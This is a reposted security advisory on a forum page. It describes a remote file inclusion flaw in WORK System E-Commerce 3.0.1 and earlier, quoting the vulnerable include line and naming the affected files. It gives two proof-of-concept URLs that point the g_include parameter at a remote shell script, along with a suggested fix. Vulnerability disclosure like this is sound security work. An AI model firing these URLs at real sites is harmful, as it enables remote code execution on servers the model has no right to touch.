发新话题
打印

WORK System E-Commerce <= 3.0.1 Remote Include Vulnerability

WORK System E-Commerce <= 3.0.1 Remote Include Vulnerability

复制内容到剪贴板
代码:
============================================================================================

WORK System E-Commerce (g_include) Remote File Inclusion Vulnerability

============================================================================================

Product............: WORK system e-commerce
Affected versions..: worksystem <= 3.0.1
Security Risk......: High
Vendor.............: Laurent Van den Reysen ([url]http://worksystem.sourceforge.net/[/url])
Product Link.......: [url]http://prdownloads.sourceforge.net/worksystem/worksystem_3_0_1.zip?download[/url]
Discovered by......: SlimTim10


Details:
---------
Many files (including index.php) use the include() function with a variable that can be
altered remotely.

Vulnerable Code:
-----------------
include ($g_include."<file>.inc");

Vulnerable Files:
------------------
&#39;index.php&#39; (main directory) along with many files in the &#39;./administration/module&#39; and
&#39;./module&#39; directories.

Proof of Concept:
------------------
http://[host]/work/index.php?g_include=[shell_script]
http://[host]/work/module/forum/forum.php?g_include=[shell_script]

Solution:
----------
No patch has been provided. The vulnerable files can be manually edited to initialize the
$g_include variable.

============================================================================================

Shoutz: Anonymous bro, Magnetosphere, dw0rek, c4p_sl0ck, str0ke!
SlimTim10 <slimtim10[at]gmail[dot]com>

============================================================================================

TOP

发新话题